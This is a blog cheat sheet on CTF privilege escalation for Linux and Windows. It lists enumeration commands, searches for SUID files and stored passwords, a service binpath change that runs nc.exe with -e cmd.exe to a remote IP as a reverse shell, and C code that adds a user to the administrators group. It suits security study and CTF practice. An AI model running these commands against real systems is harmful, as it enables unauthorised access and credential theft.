<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>CTF Methodology - Privilege Escalation | this is a tech blog</title>
  <meta name="author" content="dmeg">
  
  <meta name="description" content="Devil is in the detail. He literally is , not kidding . Once limited shell is established on the system its a good idea to escalate privileges . Because why wont you ?"> 
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="CTF Methodology - Privilege Escalation"/>
  <meta property="og:site_name" content="this is a tech blog"/>

  
    <meta property="og:image" content=""/>
  

  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  




  <!-- Matomo -->
<script type="text/javascript">
  var _paq = window._paq = window._paq || [];
  /* tracker methods like "setCustomDimension" should be called before "trackPageView" */
  _paq.push(['trackPageView']);
  _paq.push(['enableLinkTracking']);
  (function() {
    var u="https://dmegtech.matomo.cloud/";
    _paq.push(['setTrackerUrl', u+'matomo.php']);
    _paq.push(['setSiteId', '1']);
    var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
    g.type='text/javascript'; g.async=true; g.src='//cdn.matomo.cloud/dmegtech.matomo.cloud/matomo.js'; s.parentNode.insertBefore(g,s);
  })();
</script>
<!-- End Matomo Code -->


<meta name="generator" content="Hexo 5.2.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">this is a tech blog</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class="fa fa-archive"></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class="fa fa-user"></i>About
			</a>
		  </li>
		  
		  <li>
			<a href="/atom.xml" title="Subscribe me.">
			  <i class="fa fa-rss"></i>RSS
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> CTF Methodology - Privilege Escalation</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  		

	  <p>Devil is in the detail. He literally is , not kidding . Once limited shell is established on the system its a good idea to escalate privileges . Because why wont you ?</p>
<a id="more"></a>

<p>Its a good idea to get to know the system we are working with first .</p>
<h3 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h3><h4 id="Enumeration-Script"><a href="#Enumeration-Script" class="headerlink" title="Enumeration Script"></a>Enumeration Script</h4><ul>
<li><a target="_blank" rel="noopener" href="https://github.com/rebootuser/LinEnum">LinEnum</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS">LinPeas</a></li>
<li><a target="_blank" rel="noopener" href="http://pentestmonkey.net/tools/audit/unix-privesc-check">Unix privsec</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/reider-roque/linpostexp/blob/master/linprivchecker.py">Linprivchecker.py</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/kevthehermit/pentest/blob/master/linux-enum-mod.sh">Linux enum mod</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh">Linux exploit suggester</a></li>
</ul>
<h4 id="Check-distribution-type-and-version"><a href="#Check-distribution-type-and-version" class="headerlink" title="Check distribution type and version"></a>Check distribution type and version</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cat /etc/issue</span><br><span class="line">cat /etc/lsb-release      <span class="comment"># Debian based</span></span><br><span class="line">cat /etc/redhat-release   <span class="comment"># Redhat based</span></span><br></pre></td></tr></table></figure>

<h4 id="Check-kernel-version"><a href="#Check-kernel-version" class="headerlink" title="Check kernel version"></a>Check kernel version</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">rpm -q kernel</span><br><span class="line">dmesg | grep Linux</span><br><span class="line">cat /proc/version</span><br><span class="line">uname -a</span><br><span class="line">uname -mrs</span><br><span class="line">ls /boot | grep vmlinuz-</span><br></pre></td></tr></table></figure>

<h4 id="Check-env"><a href="#Check-env" class="headerlink" title="Check env"></a>Check env</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">cat /etc/profile</span><br><span class="line">cat /etc/bashrc</span><br><span class="line">cat ~/.bash_profile</span><br><span class="line">cat ~/.bashrc</span><br><span class="line">cat ~/.bash_logout</span><br><span class="line">env</span><br><span class="line"><span class="built_in">set</span></span><br></pre></td></tr></table></figure>

<h4 id="Check-what-ports-are-listening-from-inside"><a href="#Check-what-ports-are-listening-from-inside" class="headerlink" title="Check what ports are listening from inside"></a>Check what ports are listening from inside</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netstat -tulpn </span><br></pre></td></tr></table></figure>

<h4 id="Check-services-running-owned-by-root"><a href="#Check-services-running-owned-by-root" class="headerlink" title="Check services running owned by root"></a>Check services running owned by root</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ps aux | grep root</span><br><span class="line">ps -ef | grep root</span><br></pre></td></tr></table></figure>

<h4 id="Check-information-about-applications-installed"><a href="#Check-information-about-applications-installed" class="headerlink" title="Check information about applications installed"></a>Check information about applications installed</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">ls -alh /usr/bin/</span><br><span class="line">ls -alh /sbin/</span><br><span class="line">dpkg -l</span><br><span class="line">rpm -qa</span><br><span class="line">ls -alh /var/cache/apt/archivesO</span><br><span class="line">ls -alh /var/cache/yum/</span><br></pre></td></tr></table></figure>

<h4 id="Check-what-jobs-are-scheduled"><a href="#Check-what-jobs-are-scheduled" class="headerlink" title="Check what jobs are scheduled"></a>Check what jobs are scheduled</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">crontab -l</span><br><span class="line">ls -alh /var/spool/cron</span><br><span class="line">ls -al /etc/ | grep cron</span><br><span class="line">ls -al /etc/cron*</span><br><span class="line">cat /etc/cron*</span><br><span class="line">cat /etc/at.allow</span><br><span class="line">cat /etc/at.deny</span><br><span class="line">cat /etc/cron.allow</span><br><span class="line">cat /etc/cron.deny</span><br><span class="line">cat /etc/crontab</span><br><span class="line">cat /etc/anacrontab</span><br><span class="line">cat /var/spool/cron/crontabs/root</span><br></pre></td></tr></table></figure>

<h4 id="Try-to-listen-to-live-traffic"><a href="#Try-to-listen-to-live-traffic" class="headerlink" title="Try to listen to live traffic"></a>Try to listen to live traffic</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21</span><br></pre></td></tr></table></figure>

<h4 id="Self-exploration"><a href="#Self-exploration" class="headerlink" title="Self exploration"></a>Self exploration</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">id</span><br><span class="line">who</span><br><span class="line">w</span><br><span class="line">last</span><br><span class="line">cat /etc/passwd | cut -d: -f1    <span class="comment"># List of users</span></span><br><span class="line">grep -v -E <span class="string">&quot;^#&quot;</span> /etc/passwd | awk -F: <span class="string">&#x27;$3 == 0 &#123; print $1&#125;&#x27;</span>   <span class="comment"># List of super users</span></span><br><span class="line">awk -F: <span class="string">&#x27;($3 == &quot;0&quot;) &#123;print&#125;&#x27;</span> /etc/passwd   <span class="comment"># List of super users</span></span><br><span class="line">cat /etc/sudoers</span><br><span class="line">sudo -l</span><br></pre></td></tr></table></figure>

<h4 id="Find-Suid-Guid-misconfiguration-and-exploit"><a href="#Find-Suid-Guid-misconfiguration-and-exploit" class="headerlink" title="Find Suid , Guid misconfiguration and exploit"></a>Find Suid , Guid misconfiguration and exploit</h4><p>When a binary has an suid bit attached to it , it runs an another user which could be root if root’s the owner .</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#Find SUID</span></span><br><span class="line">find / -perm -u=s -<span class="built_in">type</span> f 2&gt;/dev/null</span><br><span class="line"></span><br><span class="line"><span class="comment">#Find GUID</span></span><br><span class="line">find / -perm -g=s -<span class="built_in">type</span> f 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<p>Check <a target="_blank" rel="noopener" href="https://gtfobins.github.io/">GTFOBins</a> for all SUID exploit ways</p>
<h4 id="Abuse-sudo-rights"><a href="#Abuse-sudo-rights" class="headerlink" title="Abuse sudo rights"></a>Abuse sudo rights</h4><blockquote>
<p>Im case we have a restricted shell that has access to some programs using sudo we might be able to escalate your privileges with. Any program that can write or overwrite can be used. For example, if we have sudo-rights to <code>cp</code> you can overwrite <code>/etc/shadow</code> or <code>/etc/sudoers</code> with your own malicious file.</p>
</blockquote>
<p>check for any such available binaries and again refer the amazing <a target="_blank" rel="noopener" href="https://gtfobins.github.io/">GTFOBins</a></p>
<h4 id="World-writable-scripts-onwed-by-root"><a href="#World-writable-scripts-onwed-by-root" class="headerlink" title="World writable scripts onwed by root"></a>World writable scripts onwed by root</h4><blockquote>
<p>If you find a script that is owned by root but is writable by anyone you can add your own malicious code in that script that will escalate your privileges when the script is run as root. It might be part of a cronjob, or otherwise automatized, or it might be run by hand by a sysadmin. You can also check scripts that are called by these scripts.</p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#World writable files directories</span></span><br><span class="line">find / -writable -<span class="built_in">type</span> d 2&gt;/dev/null</span><br><span class="line">find / -perm -222 -<span class="built_in">type</span> d 2&gt;/dev/null</span><br><span class="line">find / -perm -o w -<span class="built_in">type</span> d 2&gt;/dev/null</span><br><span class="line"></span><br><span class="line"><span class="comment"># World executable folder</span></span><br><span class="line">find / -perm -o x -<span class="built_in">type</span> d 2&gt;/dev/null</span><br><span class="line"></span><br><span class="line"><span class="comment"># World writable and executable folders</span></span><br><span class="line">find / \( -perm -o w -perm -o x \) -<span class="built_in">type</span> d 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<h3 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h3><h4 id="Self-exploration-1"><a href="#Self-exploration-1" class="headerlink" title="Self exploration"></a>Self exploration</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Basics</span></span><br><span class="line">systeminfo</span><br><span class="line">hostname</span><br><span class="line"></span><br><span class="line"><span class="comment"># Who am I?</span></span><br><span class="line">whoami</span><br><span class="line"><span class="built_in">echo</span> %username%</span><br><span class="line"></span><br><span class="line"><span class="comment"># What users/localgroups are on the machine?</span></span><br><span class="line">net users</span><br><span class="line">net localgroups</span><br><span class="line"></span><br><span class="line"><span class="comment"># More info about a specific user. Check if user has privileges.</span></span><br><span class="line">net user user1</span><br><span class="line"></span><br><span class="line"><span class="comment"># View Domain Groups</span></span><br><span class="line">net <span class="built_in">group</span> /domain</span><br><span class="line"></span><br><span class="line"><span class="comment"># View Members of Domain Group</span></span><br><span class="line">net <span class="built_in">group</span> /domain &lt;<span class="built_in">Group</span> Name&gt;</span><br><span class="line"></span><br><span class="line"><span class="comment"># Firewall</span></span><br><span class="line">netsh firewall show state</span><br><span class="line">netsh firewall show config</span><br><span class="line"></span><br><span class="line"><span class="comment"># Network</span></span><br><span class="line">ipconfig /all</span><br><span class="line">route print</span><br><span class="line">arp <span class="literal">-A</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># How well patched is the system?</span></span><br><span class="line">wmic qfe get Caption,Description,HotFixID,InstalledOn</span><br></pre></td></tr></table></figure>

<h4 id="Look-for-passwords"><a href="#Look-for-passwords" class="headerlink" title="Look for passwords"></a>Look for passwords</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">findstr /<span class="built_in">si</span> password *.txt</span><br><span class="line">findstr /<span class="built_in">si</span> password *.xml</span><br><span class="line">findstr /<span class="built_in">si</span> password *.ini</span><br><span class="line"></span><br><span class="line"><span class="comment">#Find all those strings in config files.</span></span><br><span class="line"><span class="built_in">dir</span> /s *pass* == *cred* == *vnc* == *.config*</span><br><span class="line"></span><br><span class="line"><span class="comment"># Find all passwords in all files.</span></span><br><span class="line">findstr /spin <span class="string">&quot;password&quot;</span> *.*</span><br><span class="line">findstr /spin <span class="string">&quot;password&quot;</span> *.*</span><br></pre></td></tr></table></figure>

<h4 id="Look-for-passwords-in-files"><a href="#Look-for-passwords-in-files" class="headerlink" title="Look for passwords in files"></a>Look for passwords in files</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">c:\sysprep.inf</span><br><span class="line">c:\sysprep\sysprep.xml</span><br><span class="line">c:\unattend.xml</span><br><span class="line">%WINDIR%\Panther\Unattend\Unattended.xml</span><br><span class="line">%WINDIR%\Panther\Unattended.xml</span><br><span class="line"></span><br><span class="line"><span class="built_in">dir</span> c:\*vnc.ini /s /b</span><br><span class="line"><span class="built_in">dir</span> c:\*ultravnc.ini /s /b </span><br><span class="line"><span class="built_in">dir</span> c:\ /s /b | findstr /<span class="built_in">si</span> *vnc.ini</span><br></pre></td></tr></table></figure>
<p>sometimes might be base64 encoded .</p>
<h4 id="Look-for-passwords-in-registry"><a href="#Look-for-passwords-in-registry" class="headerlink" title="Look for passwords in registry"></a>Look for passwords in registry</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># VNC</span></span><br><span class="line">reg query <span class="string">&quot;HKCU\Software\ORL\WinVNC3\Password&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Windows autologin</span></span><br><span class="line">reg query <span class="string">&quot;HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># SNMP Paramters</span></span><br><span class="line">reg query <span class="string">&quot;HKLM\SYSTEM\Current\ControlSet\Services\SNMP&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Putty</span></span><br><span class="line">reg query <span class="string">&quot;HKCU\Software\SimonTatham\PuTTY\Sessions&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Search for password in registry</span></span><br><span class="line">reg query HKLM /f password /t REG_SZ /s</span><br><span class="line">reg query HKCU /f password /t REG_SZ /s</span><br></pre></td></tr></table></figure>

<h4 id="Check-for-services-only-available-from-inside"><a href="#Check-for-services-only-available-from-inside" class="headerlink" title="Check for services only available from inside"></a>Check for services only available from inside</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netstat <span class="literal">-ano</span></span><br></pre></td></tr></table></figure>

<h4 id="Kernel-exploits"><a href="#Kernel-exploits" class="headerlink" title="Kernel exploits"></a>Kernel exploits</h4><p><a target="_blank" rel="noopener" href="https://github.com/rasta-mouse/Sherlock">Sherlock</a> to fnd missing software patches. Can also identify hotfixes/patches using :-</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">systeminfo</span><br><span class="line"><span class="comment"># or</span></span><br><span class="line">wmic qfe get Caption,Description,HotFixID,InstalledOn</span><br></pre></td></tr></table></figure>

<h4 id="Find-scheduled-tasks"><a href="#Find-scheduled-tasks" class="headerlink" title="Find scheduled tasks"></a>Find scheduled tasks</h4><p>Look for scheduled tasks that are run as privileged user and runs a binary we can overwrite .</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">schtasks /query /fo LIST /v</span><br><span class="line"><span class="built_in">cat</span> schtask.txt | grep <span class="string">&quot;SYSTEM\|Task To Run&quot;</span> | grep <span class="literal">-B</span> <span class="number">1</span> SYSTEM</span><br></pre></td></tr></table></figure>
<p><em>Second command in linux</em></p>
<h4 id="Change-the-upnp-service-binary"><a href="#Change-the-upnp-service-binary" class="headerlink" title="Change the upnp service binary"></a>Change the upnp service binary</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sc</span> config upnphost binpath= <span class="string">&quot;C:\Inetpub\nc.exe 192.168.1.101 6666 -e c:\Windows\system32\cmd.exe&quot;</span></span><br><span class="line"><span class="built_in">sc</span> config upnphost obj= <span class="string">&quot;.\LocalSystem&quot;</span> password= <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="built_in">sc</span> config upnphost depend= <span class="string">&quot;&quot;</span></span><br></pre></td></tr></table></figure>

<h4 id="Weak-service-permissions"><a href="#Weak-service-permissions" class="headerlink" title="Weak service permissions"></a>Weak service permissions</h4><blockquote>
<p>Services on windows are programs that run in the background. Without a GUI.<br>If you find a service that has write permissions set to <code>everyone</code> you can change that binary into your custom binary and make it execute in the privileged context.<br>First we need to find services. That can be done using <code>wmci</code> or <code>sc.exe</code>. Wmci is not available on all windows machines, and it might not be available to your user. If you don’t have access to it, you can use <code>sc.exe</code>.</p>
</blockquote>
<ul>
<li>WMCI<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic service list brief</span><br></pre></td></tr></table></figure>
<blockquote>
<p>This will produce a lot out output and we need to know which one of all of these services have weak permissions. In order to check that we can use the <code>icacls</code> program. Notice that <code>icacls</code> is only available from Vista and up. XP and lower has <code>cacls</code> instead.<br>As you can see in the command below you need to make sure that you have access to <code>wimc</code>, <code>icacls</code> and write privilege in <code>C:\windows\temp</code>.</p>
</blockquote>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> /f <span class="string">&quot;tokens=2 delims=&#x27;=&#x27;&quot;</span> %a <span class="keyword">in</span> (<span class="string">&#x27;wmic service list full^|find /i &quot;pathname&quot;^|find /i /v &quot;system32&quot;&#x27;</span>) <span class="keyword">do</span> @<span class="built_in">echo</span> %a &gt;&gt; c:\windows\temp\permissions.txt</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> /f eol^=^<span class="string">&quot;^ delims^=^&quot;</span> %a <span class="keyword">in</span> (c:\windows\temp\permissions.txt) <span class="keyword">do</span> cmd.exe /c icacls <span class="string">&quot;%a&quot;</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>Binaries in system32 are excluded since they are mostly correct, since they are installed by windows.</p>
</blockquote>
</li>
</ul>
<p>sc.exe</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sc</span> query state= all | findstr <span class="string">&quot;SERVICE_NAME:&quot;</span> &gt;&gt; Servicenames.txt</span><br><span class="line"></span><br><span class="line"><span class="keyword">FOR</span> /F %i <span class="keyword">in</span> (Servicenames.txt) <span class="keyword">DO</span> <span class="built_in">echo</span> %i</span><br><span class="line"><span class="built_in">type</span> Servicenames.txt</span><br><span class="line"></span><br><span class="line"><span class="keyword">FOR</span> /F <span class="string">&quot;tokens=2 delims= &quot;</span> %i <span class="keyword">in</span> (Servicenames.txt) <span class="keyword">DO</span> @<span class="built_in">echo</span> %i &gt;&gt; services.txt</span><br><span class="line"></span><br><span class="line"><span class="keyword">FOR</span> /F %i <span class="keyword">in</span> (services.txt) <span class="keyword">DO</span> @<span class="built_in">sc</span> qc %i | findstr <span class="string">&quot;BINARY_PATH_NAME&quot;</span> &gt;&gt; path.txt</span><br></pre></td></tr></table></figure>
<blockquote>
<p>Now you can process them one by one with the cacls command.</p>
</blockquote>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cacls <span class="string">&quot;C:\path\to\file.exe&quot;</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>What we are interested in is binaries that have been installed by the user. In the output you want to look for BUILTIN\Users:(F). Or where your user/usergroup has (F) or (C) rights.</p>
</blockquote>
<blockquote>
<p>Example:</p>
</blockquote>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">C:\path\to\file.exe </span><br><span class="line">BUILTIN\Users:F</span><br><span class="line">BUILTIN\Power Users:C </span><br><span class="line">BUILTIN\Administrators:F </span><br><span class="line">NT AUTHORITY\SYSTEM:F</span><br></pre></td></tr></table></figure>
<blockquote>
<p>That means your user has write access. So you can just rename the .exe file and then add your own malicious binary. And then restart the program and your binary will be executed instead. This can be a simple getsuid program or a reverse shell that you create with msfvenom.<br>Here is a POC code for getsuid.</p>
</blockquote>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span> <span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"><span class="keyword">int</span> i;</span><br><span class="line">    i = system(<span class="string">&quot;net localgroup administrators theusername /add&quot;</span>);</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>We then compile it with mingw like this:</p>
</blockquote>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">i686<span class="literal">-w64</span><span class="literal">-mingw32</span><span class="literal">-gcc</span> windows<span class="literal">-exp</span>.c <span class="literal">-lws2_32</span> <span class="literal">-o</span> exp.exe</span><br></pre></td></tr></table></figure>
<blockquote>
<p>We can restart the service now </p>
</blockquote>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">wmic service NAMEOFSERVICE call startservice</span><br><span class="line">net stop [<span class="type">service</span> <span class="type">name</span>] &amp;&amp; net <span class="built_in">start</span> [<span class="type">service</span> <span class="type">name</span>].</span><br></pre></td></tr></table></figure>
<blockquote>
<p>The binary should now be executed in the SYSTEM or Administrator context.</p>
</blockquote>
<h4 id="MIgrate-the-meterpreter-shell"><a href="#MIgrate-the-meterpreter-shell" class="headerlink" title="MIgrate the meterpreter shell"></a>MIgrate the meterpreter shell</h4><blockquote>
<p>If your meterpreter session dies right after you get it you need migrate it to a more stable service. A common service to migrate to is winlogon.exe since it is run by system and it is always run. You can find the PID like this:</p>
</blockquote>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic <span class="keyword">process</span> list brief | find <span class="string">&quot;winlogon&quot;</span></span><br></pre></td></tr></table></figure>
<p>So when you get the shell you can either type migrate PID or automate this so that meterpreter automatically migrates. <a target="_blank" rel="noopener" href="http://chairofforgetfulness.blogspot.cl/2014/01/better-together-scexe-and.html">Here</a> for more information</p>
<h4 id="Find-and-exploit-unquoted-service-paths"><a href="#Find-and-exploit-unquoted-service-paths" class="headerlink" title="Find and exploit unquoted service paths"></a>Find and exploit unquoted service paths</h4><p>If the path contains a space and is not quoted, the service is vulnerable.</p>
<ul>
<li>Find services with Unquoted paths</li>
</ul>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Using WMIC</span></span><br><span class="line">wmic service get name,displayname,pathname,startmode |findstr /i <span class="string">&quot;auto&quot;</span> |findstr /i /v <span class="string">&quot;c:\windows\\&quot;</span> |findstr /i /v <span class="string">&quot;&quot;</span><span class="string">&quot;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"># Using sc</span></span><br><span class="line"><span class="string">sc query</span></span><br><span class="line"><span class="string">sc qc service name</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"># Look for Binary_path_name and see if it is unquoted.</span></span><br></pre></td></tr></table></figure>

<ul>
<li>exploit it</li>
</ul>
<p>If the path to the binary is:</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c:\Program Files\something\winamp.exe</span><br></pre></td></tr></table></figure>
<p>We can place a binary like this</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c:\program.exe</span><br></pre></td></tr></table></figure>
<p>When the program is restarted it will execute the binary <code>program.exe</code>, which we of course control. We can do this in any directory that has a space in its name. Not only <code>program files</code>.</p>
<ul>
<li>There is also a metasploit module for this is: <code>exploit/windows/local/trusted_service_path</code></li>
</ul>

	  <div class="article-footer-copyright">

    本博客采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank">知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.</a>
</div>

	</div>

	
	<span id="/2020/12/21/Privilege%20Escalation%20cheat%20sheet/" class="leancloud-visitors view" data-flag-title="CTF Methodology - Privilege Escalation">
